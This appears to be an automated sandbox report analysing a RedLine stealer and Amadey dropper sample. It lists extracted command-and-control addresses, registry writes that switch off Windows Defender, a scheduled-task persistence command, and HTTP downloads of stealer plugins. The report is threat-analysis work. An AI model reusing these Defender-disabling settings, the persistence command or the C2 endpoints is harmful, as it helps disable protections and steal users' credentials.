Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
08/05/2023, 15:14 UTC
Static task
static1
Behavioral task
behavioral1
Sample
ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe
Resource
win10-20230220-en
General
-
Target
ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe
-
Size
491KB
-
MD5
6df737709ad8906c19bb6c49bc3164c3
-
SHA1
4230ced508ebfcd41555a4171d734e7bade5afc9
-
SHA256
ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c
-
SHA512
8090ee42518b7dc876169d40f98b2ab926d928c36504394ff757b3d0f3f8ec068af3ed002688079cd995513cfe03bcde9706566761ae1db9d5e52d82c46d9941
-
SSDEEP
12288:eMray90lzje3DMNUyTD+DeEGkMZNCCKKfY1m0alv0LkrF:Ay9leDXNCzKZlv0AR
Malware Config
Extracted
redline
lagu
217.196.96.101:4132
-
auth_value
8c4969092a4e18461b2347c0aa54b6a5
Extracted
amadey
3.70
212.113.119.255/joomla/index.php
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" o5795001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" o5795001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" o5795001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" o5795001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" o5795001.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Executes dropped EXE 7 IoCs
pid Process 3100 z8495843.exe 4048 o5795001.exe 4844 r1359321.exe 4748 s0285833.exe 4556 oneetx.exe 3844 oneetx.exe 3820 oneetx.exe -
Loads dropped DLL 1 IoCs
pid Process 3800 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features o5795001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" o5795001.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce z8495843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" z8495843.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4960 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4048 o5795001.exe 4048 o5795001.exe 4844 r1359321.exe 4844 r1359321.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4048 o5795001.exe Token: SeDebugPrivilege 4844 r1359321.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4748 s0285833.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3096 wrote to memory of 3100 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 66 PID 3096 wrote to memory of 3100 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 66 PID 3096 wrote to memory of 3100 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 66 PID 3100 wrote to memory of 4048 3100 z8495843.exe 67 PID 3100 wrote to memory of 4048 3100 z8495843.exe 67 PID 3100 wrote to memory of 4048 3100 z8495843.exe 67 PID 3100 wrote to memory of 4844 3100 z8495843.exe 68 PID 3100 wrote to memory of 4844 3100 z8495843.exe 68 PID 3100 wrote to memory of 4844 3100 z8495843.exe 68 PID 3096 wrote to memory of 4748 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 70 PID 3096 wrote to memory of 4748 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 70 PID 3096 wrote to memory of 4748 3096 ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe 70 PID 4748 wrote to memory of 4556 4748 s0285833.exe 71 PID 4748 wrote to memory of 4556 4748 s0285833.exe 71 PID 4748 wrote to memory of 4556 4748 s0285833.exe 71 PID 4556 wrote to memory of 4960 4556 oneetx.exe 72 PID 4556 wrote to memory of 4960 4556 oneetx.exe 72 PID 4556 wrote to memory of 4960 4556 oneetx.exe 72 PID 4556 wrote to memory of 3800 4556 oneetx.exe 74 PID 4556 wrote to memory of 3800 4556 oneetx.exe 74 PID 4556 wrote to memory of 3800 4556 oneetx.exe 74
Processes
-
C:\Users\Admin\AppData\Local\Temp\ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe"C:\Users\Admin\AppData\Local\Temp\ea39bfbb1cd7cd0d93778c543061fbcec52711ce10cab7bf32de901e1aec221c.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z8495843.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\z8495843.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\o5795001.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\o5795001.exe3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r1359321.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\r1359321.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s0285833.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s0285833.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe" /F4⤵
- Creates scheduled task(s)
PID:4960
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main4⤵
- Loads dropped DLL
PID:3800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exeC:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe1⤵
- Executes dropped EXE
PID:3844
-
C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exeC:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe1⤵
- Executes dropped EXE
PID:3820
Network
-
Remote address:8.8.8.8:53Request101.96.196.217.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpaIN PTRResponse
-
Remote address:212.113.119.255:80RequestPOST /joomla/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 212.113.119.255
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 08 May 2023 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:212.113.119.255:80RequestGET /joomla/Plugins/cred64.dll HTTP/1.1
Host: 212.113.119.255
ResponseHTTP/1.1 404 Not Found
Date: Mon, 08 May 2023 15:15:53 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
-
Remote address:212.113.119.255:80RequestGET /joomla/Plugins/clip64.dll HTTP/1.1
Host: 212.113.119.255
ResponseHTTP/1.1 200 OK
Date: Mon, 08 May 2023 15:15:53 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Fri, 14 Apr 2023 17:01:49 GMT
Connection: keep-alive
ETag: "643986fd-16400"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request255.119.113.212.in-addr.arpaIN PTRResponse255.119.113.212.in-addr.arpaIN PTRagonizing-loafaezanetwork
-
Remote address:8.8.8.8:53Request64.13.109.52.in-addr.arpaIN PTRResponse
-
98 B 80 B 2 2
-
10.1kB 7.8kB 41 31
-
4.0kB 95.1kB 79 78
HTTP Request
POST http://212.113.119.255/joomla/index.phpHTTP Response
200HTTP Request
GET http://212.113.119.255/joomla/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://212.113.119.255/joomla/Plugins/clip64.dllHTTP Response
200
-
73 B 133 B 1 1
DNS Request
101.96.196.217.in-addr.arpa
-
118 B 182 B 1 1
DNS Request
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
-
74 B 115 B 1 1
DNS Request
255.119.113.212.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
64.13.109.52.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
231KB
MD5a991257c27640d3b65e358bf525b5d56
SHA1247b439d676dffdc29a5ab90b6b618b3a0234056
SHA256787ea0de419e4abc239c1d8cc87af7b69ce89b1197d5ee6d84a7b1b2c29974cc
SHA5123155502d1f74bb9e78a2461922182d4d31c45614cd371b4e61473dfca97644ba565d7332ad100773a02a540e93bf157e9e8179fed1cdfcee8439645fb6867621
-
Filesize
309KB
MD54c1017b9ca54dd6e5baea9ed7c646d9f
SHA146576a2360b932ff562f15f22ce2688589365ff5
SHA256fa13e84b1849828388a2e25a2cb1224de1216fb8e420efff7e3d057aeb7df39f
SHA5126e53ea9fa4ba2191b5e6cf09dedb4637774472e6c7a84a866df5f8e3bda6670f6d4276ff956a55663053a422b8feccfccc62f3704c96dd9661513a449bade41a
-
Filesize
309KB
MD54c1017b9ca54dd6e5baea9ed7c646d9f
SHA146576a2360b932ff562f15f22ce2688589365ff5
SHA256fa13e84b1849828388a2e25a2cb1224de1216fb8e420efff7e3d057aeb7df39f
SHA5126e53ea9fa4ba2191b5e6cf09dedb4637774472e6c7a84a866df5f8e3bda6670f6d4276ff956a55663053a422b8feccfccc62f3704c96dd9661513a449bade41a
-
Filesize
179KB
MD506d868cbd236f569be229d7c186ded4d
SHA1b3a0e3f0f0d55f289990ebea0aaa52c76e8f60c8
SHA2562525dfb7ed48e3828b70809182ba90ad9d7ebea4c541566b9b98a728b7f3f80b
SHA5120929dd0d4373484f070186035ed652b9a199ead45cbe862a629c04e9fb54d2cddf94f4e0eb322b39cc5dd623f259984eaeec546c849ee059597506e48ada18cd
-
Filesize
179KB
MD506d868cbd236f569be229d7c186ded4d
SHA1b3a0e3f0f0d55f289990ebea0aaa52c76e8f60c8
SHA2562525dfb7ed48e3828b70809182ba90ad9d7ebea4c541566b9b98a728b7f3f80b
SHA5120929dd0d4373484f070186035ed652b9a199ead45cbe862a629c04e9fb54d2cddf94f4e0eb322b39cc5dd623f259984eaeec546c849ee059597506e48ada18cd
-
Filesize
168KB
MD5e7d55b58aad959eb8a1614f60a159f2d
SHA19fe4b317531addbbea70a201a2c4aed823de154b
SHA2562649c1ecd84f1687c057fc07aac19ed4f3498614b271bdca7d82772f01258dae
SHA512b00d306cd6d8b5dd8e9ee4e30251f0c99b099849240fe610515d8a5c84c562ecbf830380885a17a0da095126c1d25cbde401a47c8f9834a5a28a77d56a817882
-
Filesize
168KB
MD5e7d55b58aad959eb8a1614f60a159f2d
SHA19fe4b317531addbbea70a201a2c4aed823de154b
SHA2562649c1ecd84f1687c057fc07aac19ed4f3498614b271bdca7d82772f01258dae
SHA512b00d306cd6d8b5dd8e9ee4e30251f0c99b099849240fe610515d8a5c84c562ecbf830380885a17a0da095126c1d25cbde401a47c8f9834a5a28a77d56a817882
-
Filesize
89KB
MD573df88d68a4f5e066784d462788cf695
SHA1e4bfed336848d0b622fa464d40cf4bd9222aab3f
SHA256f336fa91d52edf1a977a5b8510c1a7b0b22dd6d51576765e10a1fc98fb38109f
SHA51264c7a2828b041fbc2792e8f4e39b9abea9a33356478d307681f1cba278293a0a22569bda5b7718993a5224f514c2af77fe989de14ab2a2ad219b0213fedf3817
-
Filesize
89KB
MD573df88d68a4f5e066784d462788cf695
SHA1e4bfed336848d0b622fa464d40cf4bd9222aab3f
SHA256f336fa91d52edf1a977a5b8510c1a7b0b22dd6d51576765e10a1fc98fb38109f
SHA51264c7a2828b041fbc2792e8f4e39b9abea9a33356478d307681f1cba278293a0a22569bda5b7718993a5224f514c2af77fe989de14ab2a2ad219b0213fedf3817
-
Filesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
Filesize
89KB
MD573df88d68a4f5e066784d462788cf695
SHA1e4bfed336848d0b622fa464d40cf4bd9222aab3f
SHA256f336fa91d52edf1a977a5b8510c1a7b0b22dd6d51576765e10a1fc98fb38109f
SHA51264c7a2828b041fbc2792e8f4e39b9abea9a33356478d307681f1cba278293a0a22569bda5b7718993a5224f514c2af77fe989de14ab2a2ad219b0213fedf3817